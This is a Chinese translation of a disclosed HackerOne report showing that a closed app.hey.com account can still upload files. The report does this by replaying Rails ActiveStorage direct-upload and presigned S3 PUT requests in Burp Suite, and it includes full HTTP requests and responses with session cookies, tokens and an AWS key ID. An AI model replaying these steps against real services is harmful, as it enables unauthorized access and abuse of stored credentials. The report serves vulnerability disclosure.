翻译文章|账号注销后仍然可以上传

44567

原文:

https://hackerone.com/reports/1020371

我在测试https://app.hey.com/然后我注销了我的账号，然后我返回查看历史请求，并且再次发送，然后我发现我依然可以上传文件，即使我注销了这个账号。

重现步骤：

我已经注销了我的账号。为了复现这些漏洞，需要新创建一个账号然后注销。

1. 打开burp suite然后访问https://app.hey.com/并创建一个新账号。

2. 上传任意文件并且发送post请求到app.hey.com/rails/active_storage/direct_uploads，然后把这个请求发到repeater。

3. 关闭这个账号。

4. 关闭这个账号之后，你会到这个页面。

在页面里找到csrf-token然后放到POST头里X-CSRF-Token:发送请求到app.hey.com/rails/active_storage/direct_uploads。然后把cookie修改为新的账号。

6. 回到burp的history，你会发现PUT请求，把PUT请求发到repater，https://haystack-production-storage-us-east-1.s3.amazonaws.com/<key>?x-amz-storage-class=<>&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=<>&X-Amz-Date=<>&X-Amz-Expires=300&X-Amz-SignedHeaders=content-length%3Bcontent-md5%3Bcontent-type%3Bhost&X-Amz-Signature=<>这包含了你上传的文件内容。

7. 发送以下请求

POST /rails/active_storage/direct_uploads HTTP/1.1
Host: app.hey.com
Connection: close
Content-Length: 116
Accept: application/json
X-CSRF-Token:<your_CSRF-Token>
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/83.0.4103.61 Chrome/83.0.4103.61 Safari/537.36
Content-Type: application/json
Origin: https://app.hey.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
https://app.hey.com/messages/support/new
Accept-Encoding: gzip, deflate
Accept-Language: ar,en-US;q=0.9,en;q=0.8
Cookie: <your_Cookie>
 
{"blob":{"filename":"<filename>","content_type":"<content_type>","byte_size":338,"checksum":"<checksum>"}}

响应

HTTP/1.1 200 OK
Date: Tue, 27 Oct 2020 22:40:16 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Server: openresty
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
Vary: Accept
Set-Cookie: force-primary-dc=1; path=/; max-age=3; secure
Set-Cookie: authenticity_token=ie9Iq%2By2%2B8dqEzgfYEgCWcFvD0jJ3DGH999TM8ObvceSNnk%2Beb79Myae2rImhpXVn%2F%2BD1nz3onYUawGbYZVicA%3D%3D; path=/; expires=Sat, 27 Oct 2040 22:40:16 GMT; SameSite=Lax; secure
Set-Cookie: _haystack_session=ErWRGp2IIXTWN2OcrubqWOK9GYsf1M4J%2BEQEboc%2BsTyF3Crrc8fOxS5QFq6DnhptMAqsHuToydbTzRnobqBtiR2sLiYetn4rNSit80siXqea7l0OE6fadEjpE4pA8wpHYN71HCSiJPtC%2FX0Ft9svU8xN0ybaczRDjWJi5I%2F3Qz4rPyuAdFSwHpoPrSOOC%2BYXIqeE55OBpI0VBH6IhAggK4dFiRb1Cs8jiaXVXqD%2Bi7A81ZFIw%2BLwZng0187SHY4SEaU5raCFkXuRJ6BDoq0wK8Sr5haLjTvUxFzdYdYLmsnDcslKzGb5QVNV62d9NbcmAJ6O7ZQh0vK8LxrEFA%3D%3D--pKSAzE6vGEr77yCg--R9MNGFlyj98MLnbKaX5h0Q%3D%3D; path=/; secure; HttpOnly
ETag: W/"9101e50c2c6269212bb817279c93a1e6"
Cache-Control: max-age=0, private, must-revalidate
X-Request-Id: 42cb6125062852dd41f9ae7d
X-Runtime: 0.021788
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
X-Region: us-east-1
Content-Length: 1283
 
{"id":165504432,"key":"fyeem62eqa2ipopoty6c5j0aye3t","filename":"xss.svg","content_type":"image/svg+xml","metadata":{},"byte_size":338,"checksum":"QvuRT8WQtAGYrfSb+pmYdQ==","created_at":"2020-10-27T22:40:16.000000Z","service_name":"production","signed_id":"eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaHBCTEJsM1FrPSIsImV4cCI6bnVsbCwicHVyIjoiYmxvYl9pZCJ9fQ==--4c4a7ab7c81958dee84da90fd0e5d2f759d5330f","attachable_sgid":"BAh7CEkiCGdpZAY6BkVUSSI8Z2lkOi8vaGF5c3RhY2svQWN0aXZlU3RvcmFnZTo6QmxvYi8xNjU1MDQ0MzI_ZXhwaXJlc19pbgY7AFRJIgxwdXJwb3NlBjsAVEkiD2F0dGFjaGFibGUGOwBUSSIPZXhwaXJlc19hdAY7AFQw--ee2d9e3be264f7c2628062c9d0bfd3260dbd1377","direct_upload":{"url":"https://haystack-production-storage-us-east-1.s3.amazonaws.com/fyeem62eqa2ipopoty6c5j0aye3t?x-amz-storage-class=INTELLIGENT_TIERING\u0026X-Amz-Algorithm=AWS4-HMAC-SHA256\u0026X-Amz-Credential=AKIAQ742G4ISOGL5I25G%2F20201027%2Fus-east-1%2Fs3%2Faws4_request\u0026X-Amz-Date=20201027T224016Z\u0026X-Amz-Expires=300\u0026X-Amz-SignedHeaders=content-length%3Bcontent-md5%3Bcontent-type%3Bhost\u0026X-Amz-Signature=4c158a4ecc84191abb75e4a5670dff3979cfd1e5e06cf3006c8492260b5a4f96","headers":{"Content-Type":"image/svg+xml","Content-MD5":"QvuRT8WQtAGYrfSb+pmYdQ==","Content-Disposition":"inline;
filename=\"xss.svg\"; filename*=UTF-8''xss.svg"}}}

返回haystack-production-storage-us-east-1.s3.amazonaws.com中的PUT请求，并使用您在响应中获得的新密钥替换AWS密钥。然后在body里可以上传任意文件。

发送PUT请求，然后返回上一个响应并复制signed_id值，并将其与文件名放在此处。https://app.hey.com/rails/active_storage/blobs/redirect/<signed_id>/<filename>然后您可以看到即使帐户关闭也可以上传文件。

译者按：

为什么关闭的账号还可以上传呢？盲猜一下啊，1，有可能是服务器端session还没有被删掉，服务器认为还在线。2.行业常识，注销账号只是在数据库里打个标记，并不删除数据，然后在上传的时候，并没有去检查这个标记。大家怎么看呢？欢迎各位表哥留言交流。

本文迁移自知识星球“火线Zone”